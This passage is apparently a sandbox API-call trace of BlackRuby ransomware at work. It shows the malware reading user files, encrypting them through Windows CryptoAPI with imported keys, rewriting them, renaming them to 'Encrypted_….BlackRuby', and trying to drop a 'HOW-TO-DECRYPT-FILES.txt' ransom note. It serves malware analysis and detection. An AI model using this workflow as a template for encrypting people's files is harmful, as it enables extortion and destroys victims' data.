pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360aa0) returned 1 [0050.985] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.985] GetLastError () returned 0x0 [0050.985] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1b702b0*=0x1, dwFlags=0x0) returned 1 [0050.985] GetLastError () returned 0x0 [0050.985] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1b7027c, dwFlags=0x0) returned 1 [0050.985] GetLastError () returned 0x0 [0050.985] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b702f8*, pdwDataLen=0x18ed08*=0x3d10, dwBufLen=0x3d10 | out: pbData=0x1b702f8*, pdwDataLen=0x18ed08*=0x3d10) returned 1 [0050.985] GetLastError () returned 0x0 [0050.985] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b77d44*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b77d44*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.985] GetLastError () returned 0x0 [0050.985] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b77d74*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b77d74*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.985] GetLastError () returned 0x0 [0050.985] CryptDestroyKey (hKey=0x360ee0) returned 1 [0050.985] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.985] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.985] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", lpFilePart=0x0) returned 0x2a [0050.985] GetLastError () returned 0x0 [0050.985] SetErrorMode (uMode=0x1) returned 0x0 [0050.985] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kbxkv.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.987] GetLastError () returned 0xb7 [0050.987] GetFileType (hFile=0x184) returned 0x1 [0050.987] SetErrorMode (uMode=0x0) returned 0x1 [0050.987] GetFileType (hFile=0x184) returned 0x1 [0050.988] CloseHandle (hObject=0x184) returned 1 [0050.988] GetLastError () returned 0xb7 [0050.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", lpFilePart=0x0) returned 0x2a [0050.988] GetLastError () returned 0xb7 [0050.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_z2D4mSqwBYVRreYuVJwMBRT8NjsLyP5NA9ZI0EhKvkEn.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_z2D4mSqwBYVRreYuVJwMBRT8NjsLyP5NA9ZI0EhKvkEn.BlackRuby", lpFilePart=0x0) returned 0x61 [0050.988] GetLastError () returned 0xb7 [0050.988] SetErrorMode (uMode=0x1) returned 0x0 [0050.989] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kbxkv.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20ab5d50, ftCreationTime.dwHighDateTime=0x1d352eb, ftLastAccessTime.dwLowDateTime=0x3e887df0, ftLastAccessTime.dwHighDateTime=0x1d352e4, ftLastWriteTime.dwLowDateTime=0x2698a040, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x3d20)) returned 1 [0050.989] GetLastError () returned 0xb7 [0050.989] SetErrorMode (uMode=0x0) returned 0x1 [0050.989] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kbxkv.png"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_z2D4mSqwBYVRreYuVJwMBRT8NjsLyP5NA9ZI0EhKvkEn.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_z2d4msqwbyvrreyuvjwmbrt8njslyp5na9zi0ehkvken.blackruby")) returned 1 [0050.989] GetLastError () returned 0xb7 [0050.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.989] GetLastError () returned 0xb7 [0050.990] SetErrorMode (uMode=0x1) returned 0x0 [0050.990] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.990] GetLastError () returned 0x5 [0050.990] SetErrorMode (uMode=0x0) returned 0x1 [0050.991] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", lpFilePart=0x0) returned 0x2e [0050.991] GetLastError () returned 0x5 [0050.991] SetErrorMode (uMode=0x1) returned 0x0 [0050.991] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\khdn4gnqw.avi"), fInfoLevelId=0x0, lpFileInformation=0x1ba0778 | out: lpFileInformation=0x1ba0778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa516c040, ftCreationTime.dwHighDateTime=0x1d34c2c, ftLastAccessTime.dwLowDateTime=0x2ff9d960, ftLastAccessTime.dwHighDateTime=0x1d34cf8, ftLastWriteTime.dwLowDateTime=0x2ff9d960, ftLastWriteTime.dwHighDateTime=0x1d34cf8, nFileSizeHigh=0x0, nFileSizeLow=0xbd4c)) returned 1 [0050.991] GetLastError () returned 0x5 [0050.991] SetErrorMode (uMode=0x0) returned 0x1 [0050.991] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", lpFilePart=0x0) returned 0x2e [0050.991] GetLastError () returned 0x5 [0050.991] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", lpFilePart=0x0) returned 0x2e [0050.991] GetLastError () returned 0x5 [0050.991] SetErrorMode (uMode=0x1) returned 0x0 [0050.991] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\khdn4gnqw.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.992] GetLastError () returned 0x0 [0050.992] GetFileType (hFile=0x184) returned 0x1 [0050.992] SetErrorMode (uMode=0x0) returned 0x1 [0050.992] GetFileType (hFile=0x184) returned 0x1 [0050.992] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xbd4c [0050.992] GetLastError () returned 0x0 [0050.992] ReadFile (in: hFile=0x184, lpBuffer=0x1ba277c, nNumberOfBytesToRead=0xbd4c, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1ba277c*, lpNumberOfBytesRead=0x18ed18*=0xbd4c, lpOverlapped=0x0) returned 1 [0050.994] GetLastError () returned 0x0 [0050.994] CloseHandle (hObject=0x184) returned 1 [0050.994] GetLastError () returned 0x0 [0050.994] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", lpFilePart=0x0) returned 0x2e [0050.994] GetLastError () returned 0x0 [0050.994] SetErrorMode (uMode=0x1) returned 0x0 [0050.994] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\khdn4gnqw.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa516c040, ftCreationTime.dwHighDateTime=0x1d34c2c, ftLastAccessTime.dwLowDateTime=0x2ff9d960, ftLastAccessTime.dwHighDateTime=0x1d34cf8, ftLastWriteTime.dwLowDateTime=0x2ff9d960, ftLastWriteTime.dwHighDateTime=0x1d34cf8, nFileSizeHigh=0x0, nFileSizeLow=0xbd4c)) returned 1 [0050.994] GetLastError () returned 0x0 [0050.994] SetErrorMode (uMode=0x0) returned 0x1 [0051.005] CryptImportKey (in: hProv=0x37c790, pbData=0x1c145c4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360e20) returned 1 [0051.005] GetLastError () returned 0x0 [0051.005] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.005] GetLastError () returned 0x0 [0051.010] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.010] GetLastError () returned 0x0 [0051.010] CryptDuplicateKey (in: hKey=0x360e20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360a20) returned 1 [0051.010] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.010] GetLastError () returned 0x0 [0051.010] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1c41610*=0x1, dwFlags=0x0) returned 1 [0051.010] GetLastError () returned 0x0 [0051.010] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1c415dc, dwFlags=0x0) returned 1 [0051.010] GetLastError () returned 0x0 [0051.010] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c41658*, pdwDataLen=0x18ed08*=0xbe40, dwBufLen=0xbe40 | out: pbData=0x1c41658*, pdwDataLen=0x18ed08*=0xbe40) returned 1 [0051.011] GetLastError () returned 0x0 [0051.011] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c59304*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c59304*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.011] GetLastError () returned 0x0 [0051.011] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c59334*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c59334*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.011] GetLastError () returned 0x0 [0051.012] CryptDestroyKey (hKey=0x360e20) returned 1 [0051.012] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.012] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.012] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", lpFilePart=0x0) returned 0x2e [0051.012] GetLastError () returned 0x0 [0051.012] SetErrorMode (uMode=0x1) returned 0x0 [0051.012] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\khdn4gnqw.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.014] GetLastError () returned 0xb7 [0051.014] GetFileType (hFile=0x184) returned 0x1 [0051.014] SetErrorMode (uMode=0x0) returned 0x1 [0051.014] GetFileType (hFile=0x184) returned 0x1 [0051.014] WriteFile (in: hFile=0x184, lpBuffer=0x1c59364*, nNumberOfBytesToWrite=0xbe50, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1c59364*, lpNumberOfBytesWritten=0x18ed24*=0xbe50, lpOverlapped=0x0) returned 1 [0051.017] GetLastError () returned 0xb7 [0051.017] CloseHandle (hObject=0x184) returned 1 [0051.021] GetLastError () returned 0xb7 [0051.021] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi", lpFilePart=0x0) returned 0x2e [0051.021] GetLastError () returned 0xb7 [0051.021] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_UB2py5vd9RQ4mrIE2YkTTDXdxHN41OBsKCYOU8pdh4R4.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_UB2py5vd9RQ4mrIE2YkTTDXdxHN41OBsKCYOU8pdh4R4.BlackRuby", lpFilePart=0x0) returned 0x61 [0051.021] GetLastError () returned 0xb7 [0051.021] SetErrorMode (uMode=0x1) returned 0x0 [0051.021] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\khdn4gnqw.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa516c040, ftCreationTime.dwHighDateTime=0x1d34c2c, ftLastAccessTime.dwLowDateTime=0x2ff9d960, ftLastAccessTime.dwHighDateTime=0x1d34cf8, ftLastWriteTime.dwLowDateTime=0x269d6300, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xbe50)) returned 1 [0051.021] GetLastError () returned 0xb7 [0051.021] SetErrorMode (uMode=0x0) returned 0x1 [0051.022] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\khdn4gNQW.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\khdn4gnqw.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_UB2py5vd9RQ4mrIE2YkTTDXdxHN41OBsKCYOU8pdh4R4.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_ub2py5vd9rq4mrie2ykttdxdxhn41obskcyou8pdh4r4.blackruby")) returned 1 [0051.022] GetLastError () returned 0xb7 [0051.023] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.023] GetLastError () returned 0xb7 [0051.023] SetErrorMode (uMode=0x1) returned 0x0 [0051.023] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.023] GetLastError () returned 0x5 [0051.024] SetErrorMode (uMode=0x0) returned 0x1 [0051.025] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", lpFilePart=0x0) returned 0x36 [0051.025] GetLastError () returned 0x5 [0051.025] SetErrorMode (uMode=0x1) returned 0x0 [0051.025] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pdk45u q7u1npn17t.odp"), fInfoLevelId=0x0, lpFileInformation=0x1c8245c | out: lpFileInformation=0x1c8245c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x24cd95c0, ftCreationTime.dwHighDateTime=0x1d34b56, ftLastAccessTime.dwLowDateTime=0x1110db20, ftLastAccessTime.dwHighDateTime=0x1d34a9b, ftLastWriteTime.dwLowDateTime=0x1110db20, ftLastWriteTime.dwHighDateTime=0x1d34a9b, nFileSizeHigh=0x0, nFileSizeLow=0xdba2)) returned 1 [0051.025] GetLastError () returned 0x5 [0051.025] SetErrorMode (uMode=0x0) returned 0x1 [0051.025] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", lpFilePart=0x0) returned 0x36 [0051.025] GetLastError () returned 0x5 [0051.025] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", lpFilePart=0x0) returned 0x36 [0051.025] GetLastError () returned 0x5 [0051.025] SetErrorMode (uMode=0x1) returned 0x0 [0051.025] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pdk45u q7u1npn17t.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.025] GetLastError () returned 0x0 [0051.025] GetFileType (hFile=0x184) returned 0x1 [0051.025] SetErrorMode (uMode=0x0) returned 0x1 [0051.025] GetFileType (hFile=0x184) returned 0x1 [0051.025] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xdba2 [0051.025] GetLastError () returned 0x0 [0051.025] ReadFile (in: hFile=0x184, lpBuffer=0x1c841ac, nNumberOfBytesToRead=0xdba2, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c841ac*, lpNumberOfBytesRead=0x18ed18*=0xdba2, lpOverlapped=0x0) returned 1 [0051.026] GetLastError () returned 0x0 [0051.026] CloseHandle (hObject=0x184) returned 1 [0051.026] GetLastError () returned 0x0 [0051.026] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", lpFilePart=0x0) returned 0x36 [0051.026] GetLastError () returned 0x0 [0051.026] SetErrorMode (uMode=0x1) returned 0x0 [0051.026] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pdk45u q7u1npn17t.odp"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x24cd95c0, ftCreationTime.dwHighDateTime=0x1d34b56, ftLastAccessTime.dwLowDateTime=0x1110db20, ftLastAccessTime.dwHighDateTime=0x1d34a9b, ftLastWriteTime.dwLowDateTime=0x1110db20, ftLastWriteTime.dwHighDateTime=0x1d34a9b, nFileSizeHigh=0x0, nFileSizeLow=0xdba2)) returned 1 [0051.027] GetLastError () returned 0x0 [0051.027] SetErrorMode (uMode=0x0) returned 0x1 [0051.027] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c4e8) returned 1 [0051.027] GetLastError () returned 0x0 [0051.060] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1cf9ccc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360d60) returned 1 [0051.060] GetLastError () returned 0x0 [0051.060] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.060] GetLastError () returned 0x0 [0051.066] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.066] GetLastError () returned 0x0 [0051.066] CryptDuplicateKey (in: hKey=0x360d60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360e60) returned 1 [0051.066] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.066] GetLastError () returned 0x0 [0051.066] CryptSetKeyParam (hKey=0x360e60, dwParam=0x4, pbData=0x1d26d18*=0x1, dwFlags=0x0) returned 1 [0051.066] GetLastError () returned 0x0 [0051.066] CryptSetKeyParam (hKey=0x360e60, dwParam=0x1, pbData=0x1d26ce4, dwFlags=0x0) returned 1 [0051.066] GetLastError () returned 0x0 [0051.066] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d26d60*, pdwDataLen=0x18ed08*=0xdca0, dwBufLen=0xdca0 | out: pbData=0x1d26d60*, pdwDataLen=0x18ed08*=0xdca0) returned 1 [0051.066] GetLastError () returned 0x0 [0051.066] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d426cc*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1d426cc*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.066] GetLastError () returned 0x0 [0051.066] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d426fc*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1d426fc*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.066] GetLastError () returned 0x0 [0051.067] CryptDestroyKey (hKey=0x360d60) returned 1 [0051.068] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.068] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.068] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", lpFilePart=0x0) returned 0x36 [0051.068] GetLastError () returned 0x0 [0051.068] SetErrorMode (uMode=0x1) returned 0x0 [0051.068] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pdk45u q7u1npn17t.odp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.069] GetLastError () returned 0xb7 [0051.069] GetFileType (hFile=0x184) returned 0x1 [0051.069] SetErrorMode (uMode=0x0) returned 0x1 [0051.069] GetFileType (hFile=0x184) returned 0x1 [0051.071] CloseHandle (hObject=0x184) returned 1 [0051.071] GetLastError () returned 0xb7 [0051.071] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp", lpFilePart=0x0) returned 0x36 [0051.071] GetLastError () returned 0xb7 [0051.071] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_sYrHwPyaw2P4RFHgrQ0jJdilXnCtmCbk8NwuJbzCa.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_sYrHwPyaw2P4RFHgrQ0jJdilXnCtmCbk8NwuJbzCa.BlackRuby", lpFilePart=0x0) returned 0x5e [0051.071] GetLastError () returned 0xb7 [0051.071] SetErrorMode (uMode=0x1) returned 0x0 [0051.071] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pdk45u q7u1npn17t.odp"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x24cd95c0, ftCreationTime.dwHighDateTime=0x1d34b56, ftLastAccessTime.dwLowDateTime=0x1110db20, ftLastAccessTime.dwHighDateTime=0x1d34a9b, ftLastWriteTime.dwLowDateTime=0x26a48720, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xdcb0)) returned 1 [0051.071] GetLastError () returned 0xb7 [0051.071] SetErrorMode (uMode=0x0) returned 0x1 [0051.071] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\pdk45u q7u1nPN17t.odp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pdk45u q7u1npn17t.odp"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_sYrHwPyaw2P4RFHgrQ0jJdilXnCtmCbk8NwuJbzCa.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_syrhwpyaw2p4rfhgrq0jjdilxnctmcbk8nwujbzca.blackruby")) returned 1 [0051.072] GetLastError () returned 0xb7 [0051.075] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.075] GetLastError () returned 0xb7 [0051.075] SetErrorMode (uMode=0x1) returned 0x0 [0051.075] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.075] GetLastError () returned 0x5 [0051.076] SetErrorMode (uMode=0x0) returned 0x1 [0051.076] 